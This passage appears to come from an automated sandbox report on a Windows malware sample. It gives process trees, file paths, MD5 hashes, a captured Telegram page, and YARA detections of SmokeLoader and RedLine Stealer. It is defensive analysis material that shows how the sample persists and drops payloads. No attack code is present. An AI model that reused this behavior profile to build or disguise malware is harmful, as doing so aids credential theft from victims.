                                                                                                                                                                                                  Set-Cookie: stel_ssid=2bddc583911bf88a3f_9899324691183686815; expires=Tue, 28 Sep 2021 17:35:20 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                  Cache-control: no-store
                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                  2021-09-27 17:35:20 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 68 63 64 72 6f 6d 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 44 2d 52 4f 4d 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @hcdrom1</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="CD-ROM"><meta property="og:image"


                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                  Analysis Process: pAWNholT8X.exe PID: 6436 Parent PID: 5188

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:33:23
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\pAWNholT8X.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Users\user\Desktop\pAWNholT8X.exe'
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:131072 bytes
                                                                                                                                                                                                  MD5 hash:FB45ECBFB0E13B103B6B1C583479A21D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Analysis Process: pAWNholT8X.exe PID: 1068 Parent PID: 6436

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:33:29
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\pAWNholT8X.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Users\user\Desktop\pAWNholT8X.exe'
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:131072 bytes
                                                                                                                                                                                                  MD5 hash:FB45ECBFB0E13B103B6B1C583479A21D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.435450242.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Analysis Process: svchost.exe PID: 6672 Parent PID: 560

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:33:34
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                  Imagebase:0x7ff6b7590000
                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Analysis Process: explorer.exe PID: 3440 Parent PID: 1068

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:33:35
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                  Imagebase:0x7ff6f22f0000
                                                                                                                                                                                                  File size:3933184 bytes
                                                                                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Analysis Process: svchost.exe PID: 5768 Parent PID: 560

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:33:49
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                  Imagebase:0x7ff6b7590000
                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Analysis Process: svchost.exe PID: 6856 Parent PID: 560

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:02
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                  Imagebase:0x7ff6b7590000
                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Analysis Process: svchost.exe PID: 7044 Parent PID: 560

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:11
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                  Imagebase:0x7ff6b7590000
                                                                                                                                                                                                  File size:51288 bytes
                                                                                                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  Analysis Process: ecrjwib PID: 852 Parent PID: 936

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:14
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\ecrjwib
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\ecrjwib
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:131072 bytes
                                                                                                                                                                                                  MD5 hash:FB45ECBFB0E13B103B6B1C583479A21D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  Analysis Process: 6CB1.exe PID: 3168 Parent PID: 3440

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:20
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\6CB1.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\6CB1.exe
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:131072 bytes
                                                                                                                                                                                                  MD5 hash:2616D3A90B92A23F31A0BA2508076DFC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  Analysis Process: 757C.exe PID: 5560 Parent PID: 3440

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:22
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\757C.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\757C.exe
                                                                                                                                                                                                  Imagebase:0x800000
                                                                                                                                                                                                  File size:441344 bytes
                                                                                                                                                                                                  MD5 hash:287976D8C62519CBB494CF31916CE26E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                  Analysis Process: conhost.exe PID: 5608 Parent PID: 5560

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:23
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff61de10000
                                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  Analysis Process: 8433.exe PID: 1292 Parent PID: 3440

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:26
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\8433.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\8433.exe
                                                                                                                                                                                                  Imagebase:0x300000
                                                                                                                                                                                                  File size:2766048 bytes
                                                                                                                                                                                                  MD5 hash:F853FE6B26DCF67545675AEC618F3A99
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, Author: Joe Security

                                                                                                                                                                                                  Analysis Process: 6CB1.exe PID: 6176 Parent PID: 3168

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:27
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\6CB1.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\6CB1.exe
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:131072 bytes
                                                                                                                                                                                                  MD5 hash:2616D3A90B92A23F31A0BA2508076DFC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.504353493.0000000000460000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                  Analysis Process: conhost.exe PID: 6740 Parent PID: 1292

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:28
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff61de10000
                                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  Analysis Process: 757C.exe PID: 6664 Parent PID: 5560

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:34:29
                                                                                                                                                                                                  Start date:27/09/2021
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\757C.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\757C.exe
                                                                                                                                                                                                  Imagebase:0x490000
                                                                                                                                                                                                  File size:441344 bytes
                                                                                                                                                                                                  MD5 hash:287976D8C62519CBB494CF31916CE26E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                  Reset < >